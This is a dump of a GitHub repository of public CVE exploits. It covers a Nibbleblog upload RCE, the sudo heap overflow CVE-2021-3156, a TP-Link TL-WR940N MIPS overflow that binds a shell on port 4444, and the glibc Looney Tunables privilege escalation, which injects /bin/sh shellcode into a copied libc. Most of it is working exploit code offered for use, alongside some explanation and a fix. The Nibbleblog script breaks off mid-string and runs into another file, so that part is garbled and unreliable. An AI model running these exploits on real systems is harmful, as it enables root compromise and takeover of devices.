├── CVE-2015-6967 ├── README.md ├── imgs │ ├── admin_code.png │ ├── exploit_py.png │ ├── plugin.png │ └── vuln_code.png └── nibbleblog_4.0.3_rce.py ├── CVE-2020-28038 ├── README.md └── imgs │ ├── add hook_suffix var to id var.png │ ├── bad regex.png │ ├── hook_suffix include pagenow.png │ ├── payload in js code.png │ ├── payload in the url.png │ ├── print the id variable in js.png │ └── simulate.png ├── CVE-2021-3156 ├── README.md ├── exploit.c ├── libnss_xx │ ├── flex.c │ └── flex.so.2 ├── poc │ ├── poc.mov │ └── poc.mp4 ├── root.c └── run.sh ├── CVE-2022-24355 ├── README.md └── cve-2022-24355_exploit.py ├── CVE-2023-4911 ├── README.md ├── exploit.c └── poc_video.mp4 └── README.md /CVE-2015-6967/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2015-6967 Nibbleblog 4.0.3 2 | 3 | # Explain some Technical Details 4 | 5 | When you login to the Nibbleblog dashboard, the plugin section the vulnerable plugin `My image` is making you upload an image and this is showen in the next screenshot 6 | 7 | ![upload func](https://github.com/flex0geek/cves-exploits/blob/main/CVE-2015-6967/imgs/plugin.png) 8 | 9 | when we upload an image the application create image file in the following path `/nibbleblog/content/private/plugins/my_image/image.jpg` if we take a look on the `admin.php` code we see that there is some files included 10 | 11 | ![admin_code](https://github.com/flex0geek/cves-exploits/blob/main/CVE-2015-6967/imgs/admin_code.png) 12 | 13 | the important file is 14 | ```php 15 | require(PATH_ADMIN_CONTROLLER.$layout['controller']); 16 | # PATH_ADMIN_CONTROLLER = /admin/controllers/ 17 | # $layout['controller'] = plugins/config.bit 18 | ``` 19 | we can take a look on the code in file `admin/controllers/plugins/config.bit`, the following screenshot show important variables and the issue with the first one `$extension` which contain the extension of the file and it used with the fixed file name `image` without any check on the extension 20 | 21 | ![vuln_code](https://github.com/flex0geek/cves-exploits/blob/main/CVE-2015-6967/imgs/vuln_code.png) 22 | 23 | so now if we uploaded file `test.php` it will uploaded without any filtering but with name `image.php`. 24 | 25 | To solve this issue we can create a whitelist of the allowed extensions like `jpg, png, gif, jpeg`, we can simply create something like this 26 | ```php 27 | $allowed = array('jpg','jpeg','png','gif'); 28 | $upload = 0; 29 | $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); 30 | if(in_array(strtolower($extension), $allowed)){ 31 | $upload = 1; 32 | } 33 | //code 34 | if($upload == 1){ 35 | // Upload code 36 | }else{ 37 | // Error message or extension 38 | } 39 | ``` 40 | 41 | # Exploit 42 | 43 | ![exp](https://github.com/flex0geek/cves-exploits/blob/main/CVE-2015-6967/imgs/exploit_py.png) 44 | -------------------------------------------------------------------------------- /CVE-2015-6967/imgs/admin_code.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2015-6967/imgs/admin_code.png -------------------------------------------------------------------------------- /CVE-2015-6967/imgs/exploit_py.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2015-6967/imgs/exploit_py.png -------------------------------------------------------------------------------- /CVE-2015-6967/imgs/plugin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2015-6967/imgs/plugin.png -------------------------------------------------------------------------------- /CVE-2015-6967/imgs/vuln_code.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2015-6967/imgs/vuln_code.png -------------------------------------------------------------------------------- /CVE-2015-6967/nibbleblog_4.0.3_rce.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | 3 | import requests,sys 4 | 5 | fileName = "sh.php" 6 | body=" 2 | 3 | void __attribute__ ((constructor)) setup(void) { 4 | puts("[+] CVE-2021-3156 PoC by @flex0geek aka FlEx"); 5 | puts("[+] CVE-2021-3156 Exploited"); 6 | 7 | setuid(0); 8 | setgid(0); 9 | system("/bin/sh"); 10 | } 11 | -------------------------------------------------------------------------------- /CVE-2021-3156/libnss_xx/flex.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2021-3156/libnss_xx/flex.so.2 -------------------------------------------------------------------------------- /CVE-2021-3156/poc/poc.mov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2021-3156/poc/poc.mov -------------------------------------------------------------------------------- /CVE-2021-3156/poc/poc.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2021-3156/poc/poc.mp4 -------------------------------------------------------------------------------- /CVE-2021-3156/root.c: -------------------------------------------------------------------------------- 1 | int main(int argc, char *argv[], char *envp[]) 2 | { 3 | char* _argv[] = { 4 | "/usr/bin/sudoedit", 5 | "-s", argv[0], 6 | 0 7 | }; 8 | 9 | execve("/usr/bin/sudoedit", _argv, &argv[1]); 10 | } -------------------------------------------------------------------------------- /CVE-2021-3156/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | gcc -o exploit exploit.c 2>/dev/null 3 | gcc -o root root.c 2>/dev/null 4 | gcc -shared libnss_xx/flex.c -o libnss_xx/flex.so.2 2>/dev/null 5 | 6 | ./exploit -------------------------------------------------------------------------------- /CVE-2022-24355/README.md: -------------------------------------------------------------------------------- 1 | #### Blog: [[Debug/Exploit CVE-2022-24355] TP-Link TL-WR940N Stack-based Buffer Overflow](https://flex0geek.blogspot.com/2024/04/debugexploit-cve-2022-24355-tp-link-tl.html) 2 | -------------------------------------------------------------------------------- /CVE-2022-24355/cve-2022-24355_exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from time import sleep 3 | 4 | context(arch='mips', endian='big', os='linux') 5 | 6 | # context.binary = ELF("./v4_vuln/httpd") # modify the path for httpd file if this line used. 7 | 8 | url="192.168.0.1" 9 | io = remote(url, 80) 10 | 11 | nop = asm("addiu $a0, $a0, 0x4141") # '$\x84AA' 12 | ra_addr = 0x7cfffa90 13 | avoid = b'\x00\x0a\x0d' + string.ascii_lowercase.encode() 14 | 15 | read_shell = asm(shellcraft.findpeer(io.lport)) 16 | read_shell += asm(shellcraft.read('$s0', ra_addr, 0x200)) 17 | read_shell += asm(f""" 18 | lui $t9, {ra_addr >> 16} 19 | ori $t9, $t9, {ra_addr & 0xffff} 20 | jalr $t9 21 | addiu $a0, $a0, 0x4141 22 | """) 23 | 24 | payload = b"F" * 16 25 | payload += p32(ra_addr) 26 | payload += nop * 100 27 | payload += read_shell 28 | 29 | assert all(c not in avoid for c in read_shell) 30 | 31 | # Construct HTTP GET request with headers 32 | request = b"GET /loginFs/passwd HTTP/1.1\r\n" 33 | request += b"Host: 192.168.0.1\r\n" 34 | request += b"Referer: http://192.168.0.1/\r\n" 35 | request += b"Cookie: "+payload+b"\r\n" 36 | request += b"Upgrade-Insecure-Requests: 1\r\n" 37 | request += b"\r\n" 38 | 39 | io.send(request) 40 | pause() 41 | 42 | # stage 2 43 | shell = asm(shellcraft.bindsh(4444)) 44 | io.send(shell) 45 | io.interactive() 46 | 47 | log.progress("connecting to shell") 48 | sh1 = remote("192.168.0.1", 4444) 49 | sh1.interactive() 50 | -------------------------------------------------------------------------------- /CVE-2023-4911/README.md: -------------------------------------------------------------------------------- 1 | # Exploit & Debug Looney Tunables CVE-2023-4911 Local Privilege Escalation in the glibc's ld.so. 2 | 3 | you can read [my blog](https://flex0geek.blogspot.com/2023/11/exploit-debug-looney-tunables-cve-2023.html). 4 | 5 | ## POC 6 | 7 | 8 | https://github.com/flex0geek/cves-exploits/assets/24381260/dc6454a3-a51f-40e2-975a-f2e526d1e2ab 9 | 10 | -------------------------------------------------------------------------------- /CVE-2023-4911/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define env_name "GLIBC_TUNABLES=" 10 | #define ignore_tunable env_name "glibc.malloc.mxfast=glibc.malloc.mxfast=" 11 | #define dt_rpath "\x20\x10\x10\xfe\xff\x7f" 12 | // #define dt_rpath "\xe0\xee\xff\xff\xff\x7f" // -> use it in NOASLR mode 13 | 14 | char* argv[] = {"/usr/bin/su", "--help", NULL}; 15 | 16 | void replaceBytes(FILE *file, long offset, const char *replacement, size_t replacementSize) { 17 | fseek(file, offset, SEEK_SET); 18 | fwrite(replacement, sizeof(char), replacementSize, file); 19 | } 20 | 21 | void createLibc(){ 22 | mkdir("\"", 0755); 23 | 24 | FILE *inputFile, *outputFile; 25 | char filename[] = "/usr/lib/x86_64-linux-gnu/libc.so.6"; // replace with your input file name 26 | char outputFilename[] = "\"/libc.so.6"; // replace with your output file name 27 | 28 | // Open the input file 29 | inputFile = fopen(filename, "rb"); 30 | if (inputFile == NULL) { 31 | perror("Error opening input file"); 32 | return EXIT_FAILURE; 33 | } 34 | 35 | // Create or open the output file 36 | outputFile = fopen(outputFilename, "wb"); 37 | if (outputFile == NULL) { 38 | perror("Error opening or creating output file"); 39 | fclose(inputFile); 40 | return EXIT_FAILURE; 41 | } 42 | 43 | // Replace bytes at offset 1 with the provided sequence 44 | long offsetToReplace = 171456; // start offset of __libc_main 45 | const char replacement[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05"; 46 | size_t replacementSize = sizeof(replacement) - 1; // -1 to exclude the null terminator 47 | 48 | // Copy the file content to the output file 49 | int ch; 50 | while ((ch = fgetc(inputFile)) != EOF) { 51 | fputc(ch, outputFile); 52 | } 53 | 54 | // Replace bytes at the specified offset 55 | replaceBytes(outputFile, offsetToReplace, replacement, replacementSize); 56 | 57 | // Close the files 58 | fclose(inputFile); 59 | fclose(outputFile); 60 | 61 | printf("Vulnerable libc created '%s'.\n", outputFilename); 62 | 63 | return EXIT_SUCCESS; 64 | } 65 | 66 | int64_t time_us(){ 67 | struct timespec tms; 68 | 69 | /* POSIX.1-2008 way */ 70 | if (clock_gettime(CLOCK_REALTIME, &tms)) 71 | { 72 | return -1; 73 | } 74 | /* seconds, multiplied with 1 million */ 75 | int64_t micros = tms.tv_sec * 1000000; 76 | /* Add full microseconds */ 77 | micros += tms.tv_nsec / 1000; 78 | /* round up if necessary */ 79 | if (tms.tv_nsec % 1000 >= 500) 80 | { 81 | ++micros; 82 | } 83 | return micros; 84 | } 85 | 86 | int main(){ 87 | 88 | setbuf(stdout, NULL); 89 | setbuf(stdin, NULL); 90 | setbuf(stderr, NULL); 91 | 92 | puts("FlEx exploit @ flex0geek.com"); 93 | printf("brute force 0x"); 94 | for (int i = sizeof(dt_rpath) - 1; i >= 0; i--) { 95 | printf("%02x", (unsigned char)dt_rpath[i]); 96 | } 97 | printf(" as stack address\n"); 98 | 99 | puts("Preparing environment"); 100 | char** envp = calloc(0x10000, sizeof(char*)); 101 | char** p_envp = envp; 102 | 103 | // setup directory with patched libc 104 | createLibc(); 105 | 106 | // sending first tunables without overflow 107 | int firstTunableSize = 0x1000; 108 | char* firstTunableBuf = malloc(firstTunableSize+1); 109 | strcpy(firstTunableBuf, env_name); 110 | 111 | for(int i=sizeof(env_name)-1; i < firstTunableSize; i++){ 112 | firstTunableBuf[i] = 'A'; 113 | } 114 | 115 | *p_envp = firstTunableBuf; 116 | p_envp += 1; 117 | 118 | // sending second tunable with overflow that we need 119 | int attackTunableSize = 0x3f0; 120 | char* attackTunableBuf = malloc(attackTunableSize+1+sizeof(ignore_tunable)); 121 | 122 | strcpy(attackTunableBuf, ignore_tunable); 123 | for(int i=sizeof(ignore_tunable)-1; i < (attackTunableSize+sizeof(ignore_tunable)-1); i++){ 124 | attackTunableBuf[i] = "V"; 125 | } 126 | 127 | *p_envp = attackTunableBuf; 128 | p_envp += 1; 129 | 130 | // preare the link_map struct to add the stack address(brute force) at the right offset in l_info[DT_RPATH] which is in index 15, we will use nulls before and after to not corrupt anything 131 | int firstNilSize = 0xdb; 132 | for( int i=0; i < firstNilSize; i++ ){ 133 | *p_envp = ""; 134 | p_envp += 1; 135 | } 136 | 137 | *p_envp = dt_rpath; 138 | p_envp += 1; 139 | 140 | int secondNilSize = 0x500; 141 | for( int i=0; i < secondNilSize; i++ ){ 142 | *p_envp = ""; 143 | p_envp += 1; 144 | } 145 | 146 | // send a normal tunables to not avoid overwrite the struct from the previous attack 147 | int secondTunableSize = 0x40f; 148 | char* secondTunableBuf = malloc(secondTunableSize+1); 149 | strcpy(secondTunableBuf, env_name); 150 | 151 | for(int i=sizeof(env_name)-1; i < secondTunableSize; i++){ 152 | secondTunableBuf[i] = "A"; 153 | } 154 | 155 | *p_envp = secondTunableBuf; 156 | p_envp += 1; 157 | 158 | // fill the stack with -20(0xffffffffffffffec) which is the sting from dynstr from su binary which point to " which will be used as trusted directory, we have to take care of aligment here 159 | int fillStackSize = 0x3fff; 160 | char* stackBuf= malloc( (fillStackSize+1)* sizeof(char*) ); 161 | 162 | for( int i=0; i < fillStackSize; i++ ){ 163 | ((int64_t *)stackBuf)[i]= -20; 164 | } 165 | ((int64_t *)stackBuf)[fillStackSize] = 0x0041414141414141; 166 | 167 | for( int i=0; i < 0xf; i++ ){ 168 | *p_envp = stackBuf; 169 | p_envp += 1; 170 | } 171 | 172 | // correct the alignment 173 | for( int i=0; i < 0x4; i++){ 174 | *p_envp = ""; 175 | p_envp += 1; 176 | } 177 | 178 | // brute force 179 | int pid; 180 | int count = 1; 181 | puts("Attack Started "); 182 | while( 1 ){ 183 | count++; 184 | printf("."); 185 | 186 | if( count % 100 == 0){ 187 | printf("\nWe tried %d times\n", count); 188 | } 189 | 190 | if((pid=fork()) == 0){ 191 | // child 192 | execve(argv[0], argv, envp); 193 | // break; 194 | 195 | }else{ 196 | //parent 197 | int wstatus; 198 | int st, en; 199 | st = time_us(); 200 | wait(&wstatus); 201 | en = time_us(); 202 | if( !WIFSIGNALED(wstatus) && en-st > 1000000 ){ 203 | break; 204 | } 205 | } 206 | } 207 | 208 | return 0; 209 | } -------------------------------------------------------------------------------- /CVE-2023-4911/poc_video.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2023-4911/poc_video.mp4 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVEs Exploits 2 | 3 | I'm adding exploits for some CVEs that I wrote 4 | 5 | ## 2024 6 | #### [CVE-2022-24355 TP-Link TL-WR940N Stack-based Buffer Overflow](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2022-24355) 7 | --- 8 | ## 2023 9 | #### [CVE-2023-4911 Buffer Overflow in glibc's ld.so](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2023-4911) 10 | #### [CVE-2021-3156 Heap-Based Buffer Overflow in Sudo](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2021-3156) 11 | --- 12 | ## 2021 13 | #### [CVE-2015-6967 Nibbleblog 4.0.3](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2015-6967) 14 | #### [CVE-2020-28038 WordPress before 5.5.2](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2020-28038) 15 | --------------------------------------------------------------------------------